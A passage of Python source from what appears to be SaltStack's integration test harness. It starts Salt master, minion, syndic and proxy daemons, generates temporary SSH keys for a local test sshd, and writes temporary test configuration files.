except (RuntimeWarning, RuntimeError):
sys.stdout.write(
"\r{0}\r".format(
" " * getattr(self.parser.options, "output_columns", PNUM)
)
)
sys.stdout.write(
" * {LIGHT_RED}Starting salt-minion ... FAILED!\n{ENDC}".format(
**self.colors
)
)
sys.stdout.flush()
raise TestDaemonStartFailed()
try:
sys.stdout.write(
" * {LIGHT_YELLOW}Starting sub salt-minion ... {ENDC}".format(
**self.colors
)
)
sys.stdout.flush()
self.sub_minion_process = start_daemon(
daemon_name="sub salt-minion",
daemon_id=self.master_opts["id"],
daemon_log_prefix="sub-salt-minion/{}".format(
self.sub_minion_opts["id"]
),
daemon_cli_script_name="minion",
daemon_config=self.sub_minion_opts,
daemon_config_dir=RUNTIME_VARS.TMP_SUB_MINION_CONF_DIR,
daemon_class=SaltMinion,
bin_dir_path=SCRIPT_DIR,
fail_hard=True,
event_listener_config_dir=RUNTIME_VARS.TMP_CONF_DIR,
start_timeout=120,
)
sys.stdout.write(
"\r{0}\r".format(
" " * getattr(self.parser.options, "output_columns", PNUM)
)
)
sys.stdout.write(
" * {LIGHT_GREEN}Starting sub salt-minion ... STARTED!\n{ENDC}".format(
**self.colors
)
)
sys.stdout.flush()
except (RuntimeWarning, RuntimeError):
sys.stdout.write(
"\r{0}\r".format(
" " * getattr(self.parser.options, "output_columns", PNUM)
)
)
sys.stdout.write(
" * {LIGHT_RED}Starting sub salt-minion ... FAILED!\n{ENDC}".format(
**self.colors
)
)
sys.stdout.flush()
raise TestDaemonStartFailed()
try:
sys.stdout.write(
" * {LIGHT_YELLOW}Starting syndic salt-master ... {ENDC}".format(
**self.colors
)
)
sys.stdout.flush()
self.prep_syndic()
self.smaster_process = start_daemon(
daemon_name="salt-smaster",
daemon_id=self.syndic_master_opts["id"],
daemon_log_prefix="salt-smaster/{}".format(
self.syndic_master_opts["id"]
),
daemon_cli_script_name="master",
daemon_config=self.syndic_master_opts,
daemon_config_dir=RUNTIME_VARS.TMP_SYNDIC_MASTER_CONF_DIR,
daemon_class=SaltMaster,
bin_dir_path=SCRIPT_DIR,
fail_hard=True,
event_listener_config_dir=RUNTIME_VARS.TMP_SYNDIC_MASTER_CONF_DIR,
start_timeout=120,
)
sys.stdout.write(
"\r{0}\r".format(
" " * getattr(self.parser.options, "output_columns", PNUM)
)
)
sys.stdout.write(
" * {LIGHT_GREEN}Starting syndic salt-master ... STARTED!\n{ENDC}".format(
**self.colors
)
)
sys.stdout.flush()
except (RuntimeWarning, RuntimeError):
sys.stdout.write(
"\r{0}\r".format(
" " * getattr(self.parser.options, "output_columns", PNUM)
)
)
sys.stdout.write(
" * {LIGHT_RED}Starting syndic salt-master ... FAILED!\n{ENDC}".format(
**self.colors
)
)
sys.stdout.flush()
raise TestDaemonStartFailed()
try:
sys.stdout.write(
" * {LIGHT_YELLOW}Starting salt-syndic ... {ENDC}".format(**self.colors)
)
sys.stdout.flush()
self.syndic_process = start_daemon(
daemon_name="salt-syndic",
daemon_id=self.syndic_opts["id"],
daemon_log_prefix="salt-syndic/{}".format(self.syndic_opts["id"]),
daemon_cli_script_name="syndic",
daemon_config=self.syndic_opts,
daemon_config_dir=RUNTIME_VARS.TMP_SYNDIC_MINION_CONF_DIR,
daemon_class=SaltSyndic,
bin_dir_path=SCRIPT_DIR,
fail_hard=True,
event_listener_config_dir=RUNTIME_VARS.TMP_CONF_DIR,
start_timeout=120,
)
sys.stdout.write(
"\r{0}\r".format(
" " * getattr(self.parser.options, "output_columns", PNUM)
)
)
sys.stdout.write(
" * {LIGHT_GREEN}Starting salt-syndic ... STARTED!\n{ENDC}".format(
**self.colors
)
)
sys.stdout.flush()
except (RuntimeWarning, RuntimeError):
sys.stdout.write(
"\r{0}\r".format(
" " * getattr(self.parser.options, "output_columns", PNUM)
)
)
sys.stdout.write(
" * {LIGHT_RED}Starting salt-syndic ... FAILED!\n{ENDC}".format(
**self.colors
)
)
sys.stdout.flush()
raise TestDaemonStartFailed()
if self.parser.options.proxy:
self.minion_targets.add(self.proxy_opts["id"])
try:
sys.stdout.write(
" * {LIGHT_YELLOW}Starting salt-proxy ... {ENDC}".format(
**self.colors
)
)
sys.stdout.flush()
self.proxy_process = start_daemon(
daemon_name="salt-proxy",
daemon_id=self.proxy_opts["id"],
daemon_log_prefix="salt-proxy/{}".format(self.proxy_opts["id"]),
daemon_cli_script_name="proxy",
daemon_config=self.proxy_opts,
daemon_config_dir=RUNTIME_VARS.TMP_CONF_DIR,
daemon_class=SaltProxy,
bin_dir_path=SCRIPT_DIR,
fail_hard=True,
start_timeout=120,
)
sys.stdout.write(
"\r{0}\r".format(
" " * getattr(self.parser.options, "output_columns", PNUM)
)
)
sys.stdout.write(
" * {LIGHT_GREEN}Starting salt-proxy ... STARTED!\n{ENDC}".format(
**self.colors
)
)
sys.stdout.flush()
except (RuntimeWarning, RuntimeError):
sys.stdout.write(
"\r{0}\r".format(
" " * getattr(self.parser.options, "output_columns", PNUM)
)
)
sys.stdout.write(
" * {LIGHT_RED}Starting salt-proxy ... FAILED!\n{ENDC}".format(
**self.colors
)
)
sys.stdout.flush()
raise TestDaemonStartFailed()
start_tcp_daemons = start_zeromq_daemons
def prep_syndic(self):
"""
Create a roster file for salt's syndic
"""
roster_path = os.path.join(FILES, "conf/_ssh/roster")
shutil.copy(roster_path, RUNTIME_VARS.TMP_CONF_DIR)
shutil.copy(roster_path, RUNTIME_VARS.TMP_SYNDIC_MASTER_CONF_DIR)
def prep_ssh(self):
"""
Generate keys and start an ssh daemon on an alternate port
"""
sys.stdout.write(
" * {LIGHT_GREEN}Starting {0} ... {ENDC}".format(
"SSH server", **self.colors
)
)
keygen = salt.utils.path.which("ssh-keygen")
sshd = salt.utils.path.which("sshd")
if not (keygen and sshd):
print(
"WARNING: Could not initialize SSH subsystem. Tests for salt-ssh may break!"
)
return
if not os.path.exists(RUNTIME_VARS.TMP_CONF_DIR):
os.makedirs(RUNTIME_VARS.TMP_CONF_DIR)
# Generate client key
pub_key_test_file = os.path.join(RUNTIME_VARS.TMP_CONF_DIR, "key_test.pub")
priv_key_test_file = os.path.join(RUNTIME_VARS.TMP_CONF_DIR, "key_test")
if os.path.exists(pub_key_test_file):
os.remove(pub_key_test_file)
if os.path.exists(priv_key_test_file):
os.remove(priv_key_test_file)
keygen_process = subprocess.Popen(
[
keygen,
"-t",
"ecdsa",
"-b",
"521",
"-C",
'"$(whoami)@$(hostname)-$(date -I)"',
"-f",
"key_test",
"-P",
"",
],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
close_fds=True,
cwd=RUNTIME_VARS.TMP_CONF_DIR,
)
_, keygen_err = keygen_process.communicate()
if keygen_err:
print(
"ssh-keygen had errors: {0}".format(
salt.utils.stringutils.to_str(keygen_err)
)
)
sshd_config_path = os.path.join(FILES, "conf/_ssh/sshd_config")
shutil.copy(sshd_config_path, RUNTIME_VARS.TMP_CONF_DIR)
auth_key_file = os.path.join(RUNTIME_VARS.TMP_CONF_DIR, "key_test.pub")
# Generate server key
server_key_dir = os.path.join(RUNTIME_VARS.TMP_CONF_DIR, "server")
if not os.path.exists(server_key_dir):
os.makedirs(server_key_dir)
server_dsa_priv_key_file = os.path.join(server_key_dir, "ssh_host_dsa_key")
server_dsa_pub_key_file = os.path.join(server_key_dir, "ssh_host_dsa_key.pub")
server_ecdsa_priv_key_file = os.path.join(server_key_dir, "ssh_host_ecdsa_key")
server_ecdsa_pub_key_file = os.path.join(
server_key_dir, "ssh_host_ecdsa_key.pub"
)
server_ed25519_priv_key_file = os.path.join(
server_key_dir, "ssh_host_ed25519_key"
)
server_ed25519_pub_key_file = os.path.join(
server_key_dir, "ssh_host.ed25519_key.pub"
)
for server_key_file in (
server_dsa_priv_key_file,
server_dsa_pub_key_file,
server_ecdsa_priv_key_file,
server_ecdsa_pub_key_file,
server_ed25519_priv_key_file,
server_ed25519_pub_key_file,
):
if os.path.exists(server_key_file):
os.remove(server_key_file)
keygen_process_dsa = subprocess.Popen(
[
keygen,
"-t",
"dsa",
"-b",
"1024",
"-C",
'"$(whoami)@$(hostname)-$(date -I)"',
"-f",
"ssh_host_dsa_key",
"-P",
"",
],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
close_fds=True,
cwd=server_key_dir,
)
_, keygen_dsa_err = keygen_process_dsa.communicate()
if keygen_dsa_err:
print(
"ssh-keygen had errors: {0}".format(
salt.utils.stringutils.to_str(keygen_dsa_err)
)
)
keygen_process_ecdsa = subprocess.Popen(
[
keygen,
"-t",
"ecdsa",
"-b",
"521",
"-C",
'"$(whoami)@$(hostname)-$(date -I)"',
"-f",
"ssh_host_ecdsa_key",
"-P",
"",
],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
close_fds=True,
cwd=server_key_dir,
)
_, keygen_escda_err = keygen_process_ecdsa.communicate()
if keygen_escda_err:
print(
"ssh-keygen had errors: {0}".format(
salt.utils.stringutils.to_str(keygen_escda_err)
)
)
keygen_process_ed25519 = subprocess.Popen(
[
keygen,
"-t",
"ed25519",
"-b",
"521",
"-C",
'"$(whoami)@$(hostname)-$(date -I)"',
"-f",
"ssh_host_ed25519_key",
"-P",
"",
],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
close_fds=True,
cwd=server_key_dir,
)
_, keygen_ed25519_err = keygen_process_ed25519.communicate()
if keygen_ed25519_err:
print(
"ssh-keygen had errors: {0}".format(
salt.utils.stringutils.to_str(keygen_ed25519_err)
)
)
with salt.utils.files.fopen(
os.path.join(RUNTIME_VARS.TMP_CONF_DIR, "sshd_config"), "a"
) as ssh_config:
ssh_config.write("AuthorizedKeysFile {0}\n".format(auth_key_file))
if not keygen_dsa_err:
ssh_config.write("HostKey {0}\n".format(server_dsa_priv_key_file))
if not keygen_escda_err:
ssh_config.write("HostKey {0}\n".format(server_ecdsa_priv_key_file))
if not keygen_ed25519_err:
ssh_config.write("HostKey {0}\n".format(server_ed25519_priv_key_file))
self.sshd_pidfile = os.path.join(RUNTIME_VARS.TMP_CONF_DIR, "sshd.pid")
self.sshd_process = subprocess.Popen(
[sshd, "-f", "sshd_config", "-o", "PidFile={0}".format(self.sshd_pidfile)],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
close_fds=True,
cwd=RUNTIME_VARS.TMP_CONF_DIR,
)
_, sshd_err = self.sshd_process.communicate()
if sshd_err:
print(
"sshd had errors on startup: {0}".format(
salt.utils.stringutils.to_str(sshd_err)
)
)
else:
os.environ["SSH_DAEMON_RUNNING"] = "True"
self.prep_syndic()
with salt.utils.files.fopen(
os.path.join(RUNTIME_VARS.TMP_CONF_DIR, "roster"), "a"
) as roster:
roster.write(" user: {0}\n".format(RUNTIME_VARS.RUNNING_TESTS_USER))
roster.write(
" priv: {0}/{1}\n".format(RUNTIME_VARS.TMP_CONF_DIR, "key_test")
)
if salt.utils.platform.is_darwin():
roster.write(" set_path: $PATH:/usr/local/bin/\n")
sys.stdout.write(" {LIGHT_GREEN}STARTED!\n{ENDC}".format(**self.colors))
@classmethod
def config(cls, role):
"""
Return a configuration for a master/minion/syndic.
Currently these roles are:
* master
* minion
* syndic
* syndic_master
* sub_minion
* proxy
"""
return RUNTIME_VARS.RUNTIME_CONFIGS[role]
@classmethod
def config_location(cls):
return RUNTIME_VARS.TMP_CONF_DIR
@property
def client(self):
"""
Return a local client which will be used for example to ping and sync
the test minions.
This client is defined as a class attribute because its creation needs
to be deferred to a latter stage. If created it on `__enter__` like it
previously was, it would not receive the master events.
"""
if "runtime_client" not in RUNTIME_VARS.RUNTIME_CONFIGS:
RUNTIME_VARS.RUNTIME_CONFIGS[
"runtime_client"
] = salt.client.get_local_client(mopts=self.master_opts)
return RUNTIME_VARS.RUNTIME_CONFIGS["runtime_client"]
@classmethod
def transplant_configs(cls, transport="zeromq"):
if os.path.isdir(RUNTIME_VARS.TMP):
shutil.rmtree(RUNTIME_VARS.TMP)
os.makedirs(RUNTIME_VARS.TMP)
os.makedirs(RUNTIME_VARS.TMP_ROOT_DIR)
os.makedirs(RUNTIME_VARS.TMP_CONF_DIR)
os.makedirs(RUNTIME_VARS.TMP_SUB_MINION_CONF_DIR)
os.makedirs(RUNTIME_VARS.TMP_SYNDIC_MASTER_CONF_DIR)
os.makedirs(RUNTIME_VARS.TMP_SYNDIC_MINION_CONF_DIR)
print(
" * Transplanting configuration files to '{0}'".format(
RUNTIME_VARS.TMP_CONF_DIR
)
)
tests_known_hosts_file = os.path.join(
RUNTIME_VARS.TMP_CONF_DIR, "salt_ssh_known_hosts"
)
with salt.utils.files.fopen(tests_known_hosts_file, "w") as known_hosts:
known_hosts.write("")
# This master connects to syndic_master via a syndic
master_opts = salt.config._read_conf_file(
os.path.join(RUNTIME_VARS.CONF_DIR, "master")
)
master_opts["known_hosts_file"] = tests_known_hosts_file
master_opts["cachedir"] = "cache"
master_opts["user"] = RUNTIME_VARS.RUNNING_TESTS_USER
master_opts["root_dir"] = os.path.join(TMP_ROOT_DIR)
master_opts["pki_dir"] = "pki"
master_opts["syndic_master"] = "localhost"
pytest_stop_sending_events_file = os.path.join(
TMP_ROOT_DIR, "pytest_stop_sending_events_file_master"
)
with salt.utils.files.fopen(pytest_stop_sending_events_file, "w") as wfh:
wfh.write("")
master_opts["pytest_stop_sending_events_file"] = pytest_stop_sending_events_file
file_tree = {
"root_dir": os.path.join(FILES, "pillar", "base", "file_tree"),
"follow_dir_links": False,
"keep_newline": True,
}
master_opts["ext_pillar"].append({"file_tree": file_tree})
# Config settings to test `event_return`
if "returner_dirs" not in master_opts:
master_opts["returner_dirs"] = []
master_opts["returner_dirs"].append(
os.path.join(RUNTIME_VARS.FILES, "returners")
)
master_opts["event_return"] = "runtests_noop"
# Under windows we can't seem to properly create a virtualenv off of another
# virtualenv, we can on linux but we will still point to the virtualenv binary
# outside the virtualenv running the test suite, if that's the case.
try:
real_prefix = sys.real_prefix
# The above attribute exists, this is a virtualenv
if salt.utils.platform.is_windows():
virtualenv_binary = os.path.join(
real_prefix, "Scripts", "virtualenv.exe"
)
else:
# We need to remove the virtualenv from PATH or we'll get the virtualenv binary
# from within the virtualenv, we don't want that
path = os.environ.get("PATH")
if path is not None:
path_items = path.split(os.pathsep)
for item in path_items[:]:
if item.startswith(sys.base_prefix):
path_items.remove(item)
os.environ["PATH"] = os.pathsep.join(path_items)
virtualenv_binary = salt.utils.path.which("virtualenv")
if path is not None:
# Restore previous environ PATH
os.environ["PATH"] = path
if not virtualenv_binary.startswith(real_prefix):
virtualenv_binary = None
if virtualenv_binary and not os.path.exists(virtualenv_binary):
# It doesn't exist?!
virtualenv_binary = None
except AttributeError:
# We're not running inside a virtualenv
virtualenv_binary = None
# This minion connects to master
minion_opts = salt.config._read_conf_file(
os.path.join(RUNTIME_VARS.CONF_DIR, "minion")
)
minion_opts["cachedir"] = "cache"
minion_opts["user"] = RUNTIME_VARS.RUNNING_TESTS_USER
minion_opts["root_dir"] = os.path.join(TMP_ROOT_DIR)
minion_opts["pki_dir"] = "pki"
minion_opts["hosts.file"] = os.path.join(TMP_ROOT_DIR, "hosts")
minion_opts["aliases.file"] = os.path.join(TMP_ROOT_DIR, "aliases")
if virtualenv_binary:
minion_opts["venv_bin"] = virtualenv_binary
# This sub_minion also connects to master
sub_minion_opts = salt.config._read_conf_file(
os.path.join(RUNTIME_VARS.CONF_DIR, "sub_minion")
)
sub_minion_opts["cachedir"] = "cache"
sub_minion_opts["user"] = RUNTIME_VARS.RUNNING_TESTS_USER
sub_minion_opts["root_dir"] = os.path.join(TMP, "rootdir-sub-minion")
sub_minion_opts["pki_dir"] = "pki"
sub_minion_opts["hosts.file"] = os.path.join(TMP_ROOT_DIR, "hosts")
sub_minion_opts["aliases.file"] = os.path.join(TMP_ROOT_DIR, "aliases")
if virtualenv_binary:
sub_minion_opts["venv_bin"] = virtualenv_binary
# This is the master of masters
syndic_master_opts = salt.config._read_conf_file(
os.path.join(RUNTIME_VARS.CONF_DIR, "syndic_master")
)
syndic_master_opts["cachedir"] = "cache"
syndic_master_opts["user"] = RUNTIME_VARS.RUNNING_TESTS_USER
syndic_master_opts["root_dir"] = os.path.join(TMP, "rootdir-syndic-master")
syndic_master_opts["pki_dir"] = "pki"
pytest_stop_sending_events_file = os.path.join(
TMP_ROOT_DIR, "pytest_stop_sending_events_file_syndic_master"
)
with salt.utils.files.fopen(pytest_stop_sending_events_file, "w") as wfh:
wfh.write("")
syndic_master_opts[
"pytest_stop_sending_events_file"
] = pytest_stop_sending_events_file
# This is the syndic for master
# Let's start with a copy of the syndic master configuration
syndic_opts = copy.deepcopy(syndic_master_opts)
# Let's update with the syndic configuration
syndic_opts.update(
salt.config._read_conf_file(os.path.join(RUNTIME_VARS.CONF_DIR, "syndic"))
)
syndic_opts["cachedir"] = "cache"
syndic_opts["root_dir"] = os.path.join(TMP_ROOT_DIR)
# This is the syndic for master
# Let's start with a copy of the syndic master configuration
syndic_opts = copy.deepcopy(syndic_master_opts)
# Let's update with the syndic configuration
syndic_opts.update(
salt.config._read_conf_file(os.path.join(RUNTIME_VARS.CONF_DIR, "syndic"))
)
syndic_opts["config_dir"] = RUNTIME_VARS.TMP_SYNDIC_MINION_CONF_DIR
syndic_opts["cachedir"] = os.path.join(TMP, "rootdir", "cache")
syndic_opts["root_dir"] = os.path.join(TMP, "rootdir")
# This proxy connects to master
proxy_opts = salt.config._read_conf_file(os.path.join(CONF_DIR, "proxy"))
proxy_opts["cachedir"] = "cache"
# proxy_opts['user'] = running_tests_user
proxy_opts["root_dir"] = os.path.join(TMP, "rootdir-proxy")
proxy_opts["pki_dir"] = "pki"
proxy_opts["hosts.file"] = os.path.join(TMP, "rootdir-proxy", "hosts")
proxy_opts["aliases.file"] = os.path.join(TMP, "rootdir-proxy", "aliases")
if transport == "tcp":
master_opts["transport"] = "tcp"
minion_opts["transport"] = "tcp"
sub_minion_opts["transport"] = "tcp"
syndic_master_opts["transport"] = "tcp"
proxy_opts["transport"] = "tcp"
# This is the syndic for master
# Let's start with a copy of the syndic master configuration
syndic_opts = copy.deepcopy(master_opts)
# Let's update with the syndic configuration
syndic_opts.update(
salt.config._read_conf_file(os.path.join(RUNTIME_VARS.CONF_DIR, "syndic"))
)
syndic_opts["cachedir"] = os.path.join(TMP, "rootdir", "cache")
syndic_opts["config_dir"] = RUNTIME_VARS.TMP_SYNDIC_MINION_CONF_DIR
# Set up config options that require internal data
master_opts["pillar_roots"] = syndic_master_opts["pillar_roots"] = {
"base": [
RUNTIME_VARS.TMP_PILLAR_TREE,
os.path.join(FILES, "pillar", "base"),
]
}
minion_opts["pillar_roots"] = {
"base": [
RUNTIME_VARS.TMP_PILLAR_TREE,
os.path.join(FILES, "pillar", "base"),
]
}
master_opts["file_roots"] = syndic_master_opts["file_roots"] = {
"base": [
# Let's support runtime created files that can be used like:
# salt://my-temp-file.txt
RUNTIME_VARS.TMP_STATE_TREE,
os.path.join(FILES, "file", "base"),
],
# Alternate root to test __env__ choices
"prod": [
os.path.join(FILES, "file", "prod"),
RUNTIME_VARS.TMP_PRODENV_STATE_TREE,
],
}
minion_opts["file_roots"] = {
"base": [
# Let's support runtime created files that can be used like:
# salt://my-temp-file.txt
RUNTIME_VARS.TMP_STATE_TREE,
os.path.join(FILES, "file", "base"),
],
# Alternate root to test __env__ choices
"prod": [
os.path.join(FILES, "file", "prod"),
RUNTIME_VARS.TMP_PRODENV_STATE_TREE,
],
}
master_opts.setdefault("reactor", []).append(
{"salt/minion/*/start": [os.path.join(FILES, "reactor-sync-minion.sls")]}
)
master_opts.setdefault("reactor", []).append(
{"salt/test/reactor": [os.path.join(FILES, "reactor-test.sls")]}
)
for opts_dict in (master_opts, syndic_master_opts):
if "ext_pillar" not in opts_dict:
opts_dict["ext_pillar"] = []
if salt.utils.platform.is_windows():
opts_dict["ext_pillar"].append(
{"cmd_yaml": "type {0}".format(os.path.join(FILES, "ext.yaml"))}
)
else:
opts_dict["ext_pillar"].append(
{"cmd_yaml": "cat {0}".format(os.path.join(FILES, "ext.yaml"))}
)
# all read, only owner write
autosign_file_permissions = (
stat.S_IRUSR | stat.S_IRGRP | stat.S_IROTH | stat.S_IWUSR
)
for opts_dict in (master_opts, syndic_master_opts):
# We need to copy the extension modules into the new master root_dir or
# it will be prefixed by it
new_extension_modules_path = os.path.join(
opts_dict["root_dir"], "extension_modules"
)
if not os.path.exists(new_extension_modules_path):
shutil.copytree(
os.path.join(INTEGRATION_TEST_DIR, "files", "extension_modules"),
new_extension_modules_path,
)
opts_dict["extension_modules"] = os.path.join(
opts_dict["root_dir"], "extension_modules"
)
# Copy the autosign_file to the new master root_dir
new_autosign_file_path = os.path.join(
opts_dict["root_dir"], "autosign_file"
)
shutil.copyfile(
os.path.join(INTEGRATION_TEST_DIR, "files", "autosign_file"),
new_autosign_file_path,
)
os.chmod(new_autosign_file_path, autosign_file_permissions)
# Point the config values to the correct temporary paths
for name in ("hosts", "aliases"):
optname = "{0}.file".format(name)
optname_path = os.path.join(TMP, name)
master_opts[optname] = optname_path
minion_opts[optname] = optname_path
sub_minion_opts[optname] = optname_path
syndic_opts[optname] = optname_path
syndic_master_opts[optname] = optname_path
proxy_opts[optname] = optname_path
master_opts["runtests_conn_check_port"] = get_unused_localhost_port()
minion_opts["runtests_conn_check_port"] = get_unused_localhost_port()
sub_minion_opts["runtests_conn_check_port"] = get_unused_localhost_port()
syndic_opts["runtests_conn_check_port"] = get_unused_localhost_port()
syndic_master_opts["runtests_conn_check_port"] = get_unused_localhost_port()
proxy_opts["runtests_conn_check_port"] = get_unused_localhost_port()
for conf in (
master_opts,
minion_opts,
sub_minion_opts,
syndic_opts,
syndic_master_opts,
proxy_opts,
):
if "engines" not in conf:
conf["engines"] = []
conf["engines"].append({"salt_runtests": {}})
if "engines_dirs" not in conf:
conf["engines_dirs"] = []
conf["engines_dirs"].insert(0, ENGINES_DIR)
if "log_handlers_dirs" not in conf:
conf["log_handlers_dirs"] = []
conf["log_handlers_dirs"].insert(0, LOG_HANDLERS_DIR)
conf["runtests_log_port"] = SALT_LOG_PORT
conf["runtests_log_level"] = (
os.environ.get("TESTS_MIN_LOG_LEVEL_NAME") or "debug"
)
# ----- Transcribe Configuration ---------------------------------------------------------------------------->
for entry in os.listdir(RUNTIME_VARS.CONF_DIR):
if entry in (
"master",
"minion",
"sub_minion",
"syndic",
"syndic_master",
"proxy",
):
# These have runtime computed values and will be handled
# differently
continue
entry_path = os.path.join(RUNTIME_VARS.CONF_DIR, entry)
if os.path.isfile(entry_path):
shutil.copy(entry_path, os.path.join(RUNTIME_VARS.TMP_CONF_DIR, entry))
elif os.path.isdir(entry_path):
shutil.copytree(
entry_path, os.path.join(RUNTIME_VARS.TMP_CONF_DIR, entry)
)
for entry in (
"master",
"minion",
"sub_minion",
"syndic",
"syndic_master",
"proxy",
):
computed_config = copy.deepcopy(locals()["{0}_opts".format(entry)])
with salt.utils.files.fopen(
os.path.join(RUNTIME_VARS.TMP_CONF_DIR, entry), "w"
) as fp_:
salt.utils.yaml.safe_dump(
computed_config, fp_, default_flow_style=False
)
sub_minion_computed_config = copy.deepcopy(sub_minion_opts)
with salt.utils.files.fopen(
os.path.join(RUNTIME_VARS.TMP_SUB_MINION_CONF_DIR, "minion"), "w"
) as wfh:
salt.utils.yaml.safe_dump(
sub_minion_computed_config, wfh, default_flow_style=False
)
shutil.copyfile(
os.path.join(RUNTIME_VARS.TMP_CONF_DIR, "master"),
os.path.join(RUNTIME_VARS.TMP_SUB_MINION_CONF_DIR, "master"),
)
syndic_master_computed_config = copy.deepcopy(syndic_master_opts)
with salt.utils.files.fopen(
os.path.join(RUNTIME_VARS.TMP_SYNDIC_MASTER_CONF_DIR, "master"), "w"
) as wfh:
salt.utils.yaml.safe_dump(
syndic_master_computed_config, wfh, default_flow_style=False
)
syndic_computed_config = copy.deepcopy(syndic_opts)
with salt.utils.files.fopen(
os.path.join(RUNTIME_VARS.TMP_SYNDIC_MINION_CONF_DIR, "minion"), "w"
) as wfh:
salt.utils.yaml.safe_dump(
syndic_computed_config, wfh, default_flow_style=False
)
shutil.copyfile(
os.path.join(RUNTIME_VARS.TMP_CONF_DIR, "master"),
os.path.join(RUNTIME_VARS.TMP_SYNDIC_MINION_CONF_DIR, "master"),
)
# <---- Transcribe Configuration -----------------------------------------------------------------------------
# ----- Verify Environment ---------------------------------------------------------------------------------->
master_opts = salt.config.master_config(
os.path.join(RUNTIME_VARS.TMP_CONF_DIR, "master")
)
minion_opts = salt.config.minion_config(
os.path.join(RUNTIME_VARS.TMP_CONF_DIR, "minion")
)
syndic_opts = salt.config.syndic_config(
os.path.join(RUNTIME_VARS.TMP_SYNDIC_MINION_CONF_DIR, "master"),
os.path.join(RUNTIME_VARS.TMP_SYNDIC_MINION_CONF_DIR, "minion"),
)
sub_minion_opts = salt.config.minion_config(
os.path.join(RUNTIME_VARS.TMP_SUB_MINION_CONF_DIR, "minion")
)
syndic_master_opts = salt.config.master_config(
os.path.join(RUNTIME_VARS.TMP_SYNDIC_MASTER_CONF_DIR, "master")
)
proxy_opts = salt.config.proxy_config(
os.path.join(RUNTIME_VARS.TMP_CONF_DIR, "proxy")
)
RUNTIME_VARS.RUNTIME_CONFIGS["master"] = freeze(master_opts)
RUNTIME_VARS.RUNTIME_CONFIGS["minion"] = freeze(minion_opts)
RUNTIME_VARS.RUNTIME_CONFIGS["syndic"] = freeze(syndic_opts)
RUNTIME_VARS.RUNTIME_CONFIGS["sub_minion"] = freeze(sub_minion_opts)
RUNTIME_VARS.RUNTIME_CONFIGS["syndic_master"] = freeze(syndic_master_opts)
RUNTIME_VARS.RUNTIME_CONFIGS["proxy"] = freeze(proxy_opts)
verify_env(
[
os.path.join(master_opts["pki_dir"], "minions"),
os.path.join(master_opts["pki_dir"], "minions_pre"),
os.path.join(master_opts["pki_dir"], "minions_rejected"),
os.path.join(master_opts["pki_dir"], "minions_denied"),
os.path.join(master_opts["cachedir"], "jobs"),
os.path.join(master_opts["root_dir"], "cache", "tokens"),
os.path.join(syndic_master_opts["pki_dir"], "minions"),
os.path.join(syndic_master_opts["pki_dir"], "minions_pre"),
os.path.join(syndic_master_opts["pki_dir"], "minions_rejected"),
os.path.join(syndic_master_opts["cachedir"], "jobs"),
os.path.join(syndic_master_opts["root_dir"], "cache", "tokens"),
os.path.join(master_opts["pki_dir"], "accepted"),
os.path.join(master_opts["pki_dir"], "rejected"),
os.path.join(master_opts["pki_dir"], "pending"),
os.path.join(syndic_master_opts["pki_dir"], "accepted"),
os.path.join(syndic_master_opts["pki_dir"], "rejected"),
os.path.join(syndic_master_opts["pki_dir"], "pending"),
os.path.join(minion_opts["pki_dir"], "accepted"),
os.path.join(minion_opts["pki_dir"], "rejected"),
os.path.join(minion_opts["pki_dir"], "pending"),
os.path.join(sub_minion_opts["pki_dir"], "accepted"),
os.path.join(sub_minion_opts["pki_dir"], "rejected"),
os.path.join(sub_minion_opts["pki_dir"], "pending"),
os.path.dirname(master_opts["log_file"]),
minion_opts["extension_modules"],
sub_minion_opts["extension_modules"],
sub_minion_opts["pki_dir"],
proxy_opts["pki_dir"],
master_opts["sock_dir"],
syndic_master_opts["sock_dir"],
sub_minion_opts["sock_dir"],
minion_opts["sock_dir"],
RUNTIME_VARS.TMP_STATE_TREE,
RUNTIME_VARS.TMP_PILLAR_TREE,
RUNTIME_VARS.TMP_PRODENV_STATE_TREE,
TMP,
],
RUNTIME_VARS.RUNNING_TESTS_USER,
root_dir=master_opts["root_dir"],
)
cls.master_opts = master_opts
cls.minion_opts = minion_opts
# cls.proxy_opts = proxy_opts
cls.sub_minion_opts = sub_minion_opts
cls.syndic_opts = syndic_opts
cls.syndic_master_opts = syndic_master_opts
cls.proxy_opts = proxy_opts
# <---- Verify Environment -----------------------------------------------------------------------------------
def __exit__(self, type, value, traceback):
"""
Kill the minion and master processes
"""
try:
if hasattr(self.sub_minion_process, "terminate"):
self.sub_minion_process.terminate()
else:
log.error("self.sub_minion_process can't be terminate.")
except AttributeError:
pass
try:
if hasattr(self.minion_process, "terminate"):
self.minion_process.terminate()
else:
log.error("self.minion_process can't be terminate.")
except AttributeError:
pass
if hasattr(self, "proxy_process"):
self.proxy_process.terminate()
try:
if hasattr(self.master_process, "terminate"):
self.master_process.terminate()
else:
log.error("self.master_process can't be terminate.")
except AttributeError:
pass
try:
self.syndic_process.terminate()
except AttributeError:
pass
try:
self.smaster_process.terminate()
except AttributeError:
pass
self._exit_mockbin()
self._exit_ssh()
# Shutdown the multiprocessing logging queue listener
salt_log_setup.shutdown_multiprocessing_logging()
salt_log_setup.shutdown_multiprocessing_logging_listener(daemonizing=True)
# Shutdown the log server
self.log_server.shutdown()
self.log_server.server_close()
self.log_server_process.join()
def pre_setup_minions(self):
"""
Subclass this method for additional minion setups.
"""
def setup_minions(self):
"""
Minions setup routines
"""
def post_setup_minions(self):
"""
Subclass this method to execute code after the minions have been setup
"""
def _enter_mockbin(self):
path = os.environ.get("PATH", "")
path_items = path.split(os.pathsep)
if MOCKBIN not in path_items:
path_items.insert(0, MOCKBIN)
os.environ["PATH"] = os.pathsep.join(path_items)
def _exit_ssh(self):
if hasattr(self, "sshd_process"):
try:
self.sshd_process.kill()
except OSError as exc:
if exc.errno != 3:
raise
with salt.utils.files.fopen(self.sshd_pidfile) as fhr:
try:
os.kill(int(fhr.read()), signal.SIGKILL)
except OSError as exc:
if exc.errno != 3:
raise
def _exit_mockbin(self):
path = os.environ.get("PATH", "")
path_items = path.split(os.pathsep)
try:
path_items.remove(MOCKBIN)
except ValueError:
pass
os.environ["PATH"] = os.pathsep.join(path_items)
@classmethod
def clean(cls):
"""
Clean out the tmp files
"""
def remove_readonly(func, path, excinfo):
if os.path.exists(path):
# Give full permissions to owner
